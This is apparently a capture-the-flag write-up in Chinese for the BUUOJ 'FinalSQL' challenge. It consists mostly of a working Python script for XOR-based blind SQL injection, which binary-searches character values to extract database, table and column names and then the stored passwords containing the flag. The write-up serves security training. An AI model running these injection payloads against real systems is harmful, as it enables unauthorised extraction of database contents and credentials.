[极客大挑战 2019]FinalSQL
点进来看到这样的页面,万能密码试了下没用,不过作者这里也提示过盲注了。注入点是点击神秘代码1以后的这个界面,尝试?id=1^(1==1)^1
,页面正常回显,说明可以注入。
这里参考了大佬写的脚本,毕竟盲注实在太花时间了。网上还有其他更简练的脚本,但是我跑的时候都不是很稳定,爆出来的字段名有时候会有错误。这个用了三个payload,虽然看起来麻烦了点,但是胜在稳定。
import requests
import re
import string
s = requests.session()
url = "http://7ceca060-f463-4e2b-9aff-bc77774807fe.node4.buuoj.cn/search.php"
table = ""
for i in range(1, 300):
print(i)
high = 128
low = 31
while (low <= high):
mid = (low + high) // 2
# 爆库名
# 1^(ascii(substr((select(group_concat(schema_name))from(information_schema.schemata)),1,1))>1)^1
payload11 = "1^(ascii(substr((select(group_concat(schema_name))from(information_schema.schemata)),%d,1))=%d)^1"%(i,mid)
payload12 = "1^(ascii(substr((select(group_concat(schema_name))from(information_schema.schemata)),%d,1))<%d)^1"%(i,mid)
payload13 = "1^(ascii(substr((select(group_concat(schema_name))from(information_schema.schemata)),%d,1))>%d)^1"%(i,mid)
# 爆表名
# payload2 = "1^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)='geek'),%d,1))=%d)^1"%(i,mid)
'''
payload11 = "1^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)='geek'),%d,1))=%d)^1"%(i,mid)
payload12 = "1^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)='geek'),%d,1))<%d)^1"%(i,mid)
payload13 = "1^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)='geek'),%d,1))>%d)^1"%(i,mid)
'''
# 爆字段名
# payload3 = "1^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='F1naI1y')),%d,1))=%d)^1"%(i,mid)
'''
payload11 = "1^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='F1naI1y')),%d,1))=%d)^1"%(i,mid)
payload12 = "1^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='F1naI1y')),%d,1))<%d)^1"%(i,mid)
payload13 = "1^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='F1naI1y')),%d,1))>%d)^1"%(i,mid)
'''
# 爆字段值
# payload4 = "1^(ascii(substr((select(group_concat(password))from(F1naI1y)),%d,1))=%d)^1"%(i,mid)
#payload11 = "1^(ascii(substr((select(group_concat(password))from(F1naI1y)),%d,1))=%d)^1" % (i, mid)
#payload12 = "1^(ascii(substr((select(group_concat(password))from(F1naI1y)),%d,1))<%d)^1" % (i, mid)
#payload13 = "1^(ascii(substr((select(group_concat(password))from(F1naI1y)),%d,1))>%d)^1" % (i, mid)
ra11 = s.get(url=url + "?id=" + payload11).text
ra12 = s.get(url=url + "?id=" + payload12).text
ra13 = s.get(url=url + "?id=" + payload13).text
if 'Click' in ra11:
table += chr(mid)
print(table)
break
if 'Click' in ra12:
#print ("'low='+%d + 'high=' + %d"%(low,high))
high = mid - 1
if "Click" in ra13:
#print ("'low='+%d + 'high=' + %d"%(low,high))
low = mid + 1
先爆库名,猜测是geek,或者用"id=1^(ascii(substr((select(database())),%d,1))<%d)^1" % (i,mid)
再爆表名,这里我一开始以为在Flaaaaag里,但是接着做下去发觉不对了(狡猾的出题人)
爆F1naI1y里的字段名
最后爆一波password,找到flag